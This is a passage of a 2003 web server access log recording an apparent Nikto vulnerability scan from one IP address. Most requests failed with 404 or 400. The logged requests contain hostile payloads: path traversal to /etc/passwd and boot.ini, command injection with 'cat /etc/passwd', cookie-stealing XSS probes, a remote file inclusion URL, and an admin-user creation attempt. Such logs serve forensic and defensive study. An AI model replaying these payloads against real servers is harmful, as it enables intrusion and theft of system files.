[24/Jul/2003:01:35:35 +0900] "GET /cfdocs/cfmlsyntaxcheck.cfm HTTP/1.0" 404 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:36 +0900] "GET /cfdocs/exampleapp/docs/sourcewindow.cfm?Template=c:\\boot.ini HTTP/1.0" 404 311 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:36 +0900] "GET /cfdocs/exampleapp/email/application.cfm HTTP/1.0" 404 311 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:37 +0900] "GET /cfdocs/exampleapp/email/getfile.cfm?filename=c:\\boot.ini HTTP/1.0" 404 307 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:38 +0900] "GET /cfdocs/exampleapp/publish/admin/addcontent.cfm HTTP/1.0" 404 318 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:38 +0900] "GET /cfdocs/exampleapp/publish/admin/application.cfm HTTP/1.0" 404 319 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:39 +0900] "GET /cfdocs/examples/cvbeans/beaninfo.cfm HTTP/1.0" 404 308 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:40 +0900] "GET /cfdocs/examples/httpclient/mainframeset.cfm HTTP/1.0" 404 315 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:41 +0900] "GET /cfdocs/examples/parks/detail.cfm HTTP/1.0" 404 304 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:41 +0900] "GET /cfdocs/expeval/displayopenedfile.cfm HTTP/1.0" 404 308 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:42 +0900] "GET /cfdocs/expeval/exprcalc.cfm?OpenFilePath=c:\\boot.ini HTTP/1.0" 404 299 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:43 +0900] "GET!not found /cfdocs/expeval/openfile.cfm HTTP/1.0" 400 377 "-" "-" 212.92.77.254 - - [24/Jul/2003:01:35:43 +0900] "GET /cfdocs/expeval/openfile.cfm HTTP/1.0" 404 299 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:44 +0900] "GET!not found /cfdocs/expeval/sendmail.cfm HTTP/1.0" 400 377 "-" "-" 212.92.77.254 - - [24/Jul/2003:01:35:45 +0900] "GET!not found /cfdocs/snippets/evaluate.cfm HTTP/1.0" 400 377 "-" "-" 212.92.77.254 - - [24/Jul/2003:01:35:46 +0900] "GET!not found /cfdocs/snippets/fileexists.cfm HTTP/1.0" 400 377 "-" "-" 212.92.77.254 - - [24/Jul/2003:01:35:46 +0900] "GET /cfdocs/snippets/gettempdirectory.cfm HTTP/1.0" 404 308 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:47 +0900] "GET /cfdocs/snippets/viewexample.cfm HTTP/1.0" 404 303 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:48 +0900] "GET /CFIDE/administrator/index.cfm HTTP/1.0" 404 301 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:48 +0900] "GET /cfide/administrator/index.cfm HTTP/1.0" 404 301 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:49 +0900] "GET /CFIDE/administrator/index.cfm HTTP/1.0" 404 301 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:50 +0900] "GET /cfide/Administrator/startstop.html HTTP/1.0" 404 306 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:51 +0900] "GET /CFIDE/probe.cfm HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:51 +0900] "GET /cgi-bin-sdb/printenv HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:52 +0900] "GET /cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi HTTP/1.0" 404 315 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:53 +0900] "GET /cgi-bin/admin/admin.cgi HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:53 +0900] "GET /cgi-bin/admin/setup.cgi HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:54 +0900] "GET /cgi-bin/bigconf.cgi HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:55 +0900] "GET /cgi-bin/common/listrec.pl HTTP/1.0" 404 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:56 +0900] "GET /cgi-bin/dbmlparser.exe HTTP/1.0" 404 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:56 +0900] "GET /cgi-bin/handler HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:57 +0900] "GET /cgi-bin/handler/netsonar;cat\t/etc/passwd|?data=Download HTTP/1.0" 400 377 "-" "-" 212.92.77.254 - - [24/Jul/2003:01:35:58 +0900] "GET /cgi-bin/icat HTTP/1.0" 404 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:58 +0900] "GET /cgi-bin/MachineInfo HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:35:59 +0900] "GET /cgi-bin/pfdisplay.cgi HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:00 +0900] "GET /cgi-bin/test2.pl?&lt;script&gt;alert('Vulnerable');&lt;/script&gt; HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:01 +0900] "GET /cgi-bin/webdist.cgi HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:01 +0900] "GET /cgi-bin/wrap HTTP/1.0" 404 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:02 +0900] "GET /cgi-local/cgiemail-1.4/cgicso?query=<script>alert('Vulnerable')</script> HTTP/1.0" 404 301 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:03 +0900] "GET /cgi-local/cgiemail-1.4/cgicso?query=AAA HTTP/1.0" 404 301 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:03 +0900] "GET /cgi-local/cgiemail-1.6/cgicso?query=<script>alert('Vulnerable')</script> HTTP/1.0" 404 301 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:04 +0900] "GET /cgi-local/cgiemail-1.6/cgicso?query=AAA HTTP/1.0" 404 301 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:05 +0900] "GET /cgi-shop/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:06 +0900] "GET /cgi-sys/addalink.cgi HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:06 +0900] "GET /cgi-sys/cgiecho HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:07 +0900] "GET /cgi-sys/cgiemail HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:08 +0900] "GET /cgi-sys/countedit HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:08 +0900] "GET /cgi-sys/domainredirect.cgi HTTP/1.0" 404 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:09 +0900] "GET /cgi-sys/entropybanner.cgi HTTP/1.0" 404 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:10 +0900] "GET /cgi-sys/entropysearch.cgi HTTP/1.0" 404 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:11 +0900] "GET /cgi-sys/FormMail-clone.cgi HTTP/1.0" 404 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:11 +0900] "GET /cgi-sys/helpdesk.cgi HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:12 +0900] "GET /cgi-sys/mchat.cgi HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:13 +0900] "GET /cgi-sys/randhtml.cgi HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:13 +0900] "GET /cgi-sys/realhelpdesk.cgi HTTP/1.0" 404 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:14 +0900] "GET /cgi-sys/realsignup.cgi HTTP/1.0" 404 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:15 +0900] "GET /cgi-sys/scgiwrap HTTP/1.0" 404 288 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:16 +0900] "GET /cgi-sys/signup.cgi HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:16 +0900] "GET /cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\\windows\\win.ini HTTP/1.0" 404 303 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:17 +0900] "GET /cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\\winnt\\win.ini HTTP/1.0" 404 303 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:18 +0900] "GET /cgi/cgiproc? HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:18 +0900] "GET /cgis/wwwboard/wwwboard.cgi HTTP/1.0" 404 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:19 +0900] "GET /cgis/wwwboard/wwwboard.pl HTTP/1.0" 404 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:20 +0900] "GET /chassis/config/GeneralChassisConfig.html HTTP/1.0" 404 312 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:21 +0900] "GET /chat/!nicks.txt HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:21 +0900] "GET /chat/!pwds.txt HTTP/1.0" 404 286 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:22 +0900] "GET /chat/data/usr HTTP/1.0" 404 285 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:23 +0900] "GET /chat/register.php?register=yes&username=OverG&email=<script>alert%20(\\\"Vulnerable\\\")</script>&email1=<script>alert%20(\\\"Vulnerable\\\")</script> HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:23 +0900] "GET /class/mysql.class HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:24 +0900] "GET /cleartrust/ct_logon.asp?CTAuthMode=BASIC&CTLoginErrorMsg=xx&ct_orig_uri=\\\">< script>alert(1)/script><\\\" HTTP/1.0" 400 377 "-" "-" 212.92.77.254 - - [24/Jul/2003:01:36:25 +0900] "GET /cleartrust/ct_logon.asp?CTLoginErrorMsg=<script>alert(1)</script> HTTP/1.0" 404 295 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:26 +0900] "GET /code/ HTTP/1.0" 404 277 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:26 +0900] "GET /com HTTP/1.0" 404 275 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:27 +0900] "GET /COM HTTP/1.0" 404 275 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:28 +0900] "GET /comments.php?subject=<script>alert('Vulnerable')</script>&comment=<script>alert('Vulnerable')</script>&pid=0&sid=0&mode=&order=&thold=op=Preview HTTP/1.0" 404 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:28 +0900] "GET /comments/browse.php?fid=2&tid=4&go=&lt;script&gt;alert('Vulnerable')&lt;/script&gt; HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:29 +0900] "GET /config.inc HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:30 +0900] "GET /config.php HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:30 +0900] "GET /config/ HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:31 +0900] "GET /config/ HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:32 +0900] "GET /config/checks.txt HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:33 +0900] "GET /Config1.htm HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:33 +0900] "GET /contents.php?new_language=elvish&mode=select HTTP/1.0" 404 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:34 +0900] "GET /counter/ HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:35 +0900] "GET /counter/1/n/n/0/3/5/0/a/123.gif HTTP/1.0" 404 303 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:36 +0900] "GET /cpanel/ HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:36 +0900] "GET /cplogfile.log HTTP/1.0" 404 285 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:37 +0900] "GET /credit/ HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:38 +0900] "GET /current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:38 +0900] "GET /current/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1 HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:39 +0900] "GET /custdata/ HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:40 +0900] "GET /customers/ HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:40 +0900] "GET /CVS/Entries HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:41 +0900] "GET /dan_o.dat HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:42 +0900] "GET /dat/ HTTP/1.0" 404 276 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:43 +0900] "GET /data.sql HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:43 +0900] "GET /data/ HTTP/1.0" 404 277 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:44 +0900] "GET /data/member_log.txt HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:45 +0900] "GET /data/userlog/log.txt HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:45 +0900] "GET /database/ HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:46 +0900] "GET /database/metacart.mdb HTTP/1.0" 404 293 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:47 +0900] "GET /databases/ HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:48 +0900] "GET /databse.sql HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:48 +0900] "GET /db.sql HTTP/1.0" 404 278 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:49 +0900] "GET /db/ HTTP/1.0" 404 275 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:50 +0900] "GET /db/users.dat HTTP/1.0" 404 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:50 +0900] "GET /DB4Web/10.10.10.10:100 HTTP/1.0" 404 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:51 +0900] "GET /dbase/ HTTP/1.0" 404 278 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:52 +0900] "GET /dc/auth_data/auth_user_file.txt HTTP/1.0" 404 303 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:53 +0900] "GET /dc/orders/orders.txt HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:53 +0900] "GET /dcforum/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:54 +0900] "GET /dcshop/auth_data/auth_user_file.txt HTTP/1.0" 404 307 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:55 +0900] "GET /dcshop/orders/orders.txt HTTP/1.0" 404 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:55 +0900] "GET /default.php?error_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:56 +0900] "GET /default.php?info_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:57 +0900] "GET /demo/ HTTP/1.0" 404 277 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:58 +0900] "GET /demo/ojspext/events/globals.jsa HTTP/1.0" 404 303 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:58 +0900] "GET /demo/sql/index.jsp HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:36:59 +0900] "GET /dev/ HTTP/1.0" 404 276 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:00 +0900] "GET /dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00 HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:00 +0900] "GET /dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00 HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:01 +0900] "GET /devel/ HTTP/1.0" 404 278 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:02 +0900] "GET /development/ HTTP/1.0" 404 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:03 +0900] "GET /directory.php?dir=%3Bcat%20/etc/passwd HTTP/1.0" 404 285 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:03 +0900] "GET /DMR/ HTTP/1.0" 404 276 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:04 +0900] "GET /dms0 HTTP/1.0" 404 276 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:05 +0900] "GET /doc-html/ HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:06 +0900] "GET /doc/ HTTP/1.0" 404 276 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:06 +0900] "GET /doc/packages/ HTTP/1.0" 404 285 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:07 +0900] "GET /docs/showtemp.cfm?TYPE=JPEG&FILE=c:\\boot.ini HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:08 +0900] "GET /DomainFiles/*//../../../../../../../../../../etc/passwd HTTP/1.0" 400 389 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:08 +0900] "GET /dostuff.php?action=modify_user HTTP/1.0" 404 283 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:09 +0900] "GET /down/ HTTP/1.0" 404 277 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:10 +0900] "GET /download.php?op=viewdownload HTTP/1.0" 404 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:11 +0900] "GET /download.php?op=viewdownload HTTP/1.0" 404 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:11 +0900] "GET /download.php?sortby=&dcategory=<script>alert('Vulnerable')</script> HTTP/1.0" 404 284 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:12 +0900] "GET /download/ HTTP/1.0" 404 281 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:13 +0900] "GET /downloads/ HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:13 +0900] "GET /downloads/pafiledb.php?action=download&id=4?\\\"&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\\\" HTTP/1.0" 404 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:14 +0900] "GET /downloads/pafiledb.php?action=email&id=4?\\\"&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\\\" HTTP/1.0" 404 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:15 +0900] "GET /downloads/pafiledb.php?action=rate&id=4?\\\"&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\\\" HTTP/1.0" 404 294 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:16 +0900] "GET /easylog/easylog.html HTTP/1.0" 404 292 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:16 +0900] "GET /edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:17 +0900] "GET /emailfriend/emailarticle.php?id=\\\"<script>alert(document.cookie)</script> HTTP/1.0" 404 300 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:18 +0900] "GET /emailfriend/emailfaq.php?id=\\\"<script>alert(document.cookie)</script> HTTP/1.0" 404 296 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:19 +0900] "GET /emailfriend/emailnews.php?id=\\\"<script>alert(document.cookie)</script> HTTP/1.0" 404 297 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:19 +0900] "GET /employees/ HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:20 +0900] "GET /error/500error.jsp?et=1<script>alert('Vulnerable')</script>; HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:21 +0900] "GET /errors/needinit.php?GALLERY_BASEDIR=http://xxxxxxxx/ HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:21 +0900] "GET /etc/passwd HTTP/1.0" 404 282 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:22 +0900] "GET /ews/ews/architext_query.pl HTTP/1.0" 404 298 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:23 +0900] "GET /examples/basic/servlet/HelloServlet HTTP/1.0" 404 307 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:24 +0900] "GET /examples/jsp/snp/anything.snp HTTP/1.0" 404 301 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:24 +0900] "GET /exe/ HTTP/1.0" 404 276 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:25 +0900] "GET /exec/show/config/cr HTTP/1.0" 404 291 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:26 +0900] "GET /ext.dll?MfcIsapiCommand=LoadPage&page=admin.hts%20&a0=add&a1=root&a2=%5C HTTP/1.0" 404 279 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:26 +0900] "GET /ext.ini.%00.txt HTTP/1.0" 404 280 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:27 +0900] "GET /ezhttpbench.php?AnalyseSite=/etc/passwd&NumLoops=1 HTTP/1.0" 404 287 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:28 +0900] "GET /fcgi-bin/echo.exe?foo=<script>alert('Vulnerable')</script> HTTP/1.0" 404 289 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:29 +0900] "GET /fcgi-bin/echo2.exe?foo=<script>alert('Vulnerable')</script> HTTP/1.0" 404 290 "-" "Mozilla/4.75 (Nikto/1.30 )" 212.92.77.254 - - [24/Jul/2003:01:37:29 +0900] "GET /file-that-is-not-real-2002.php3 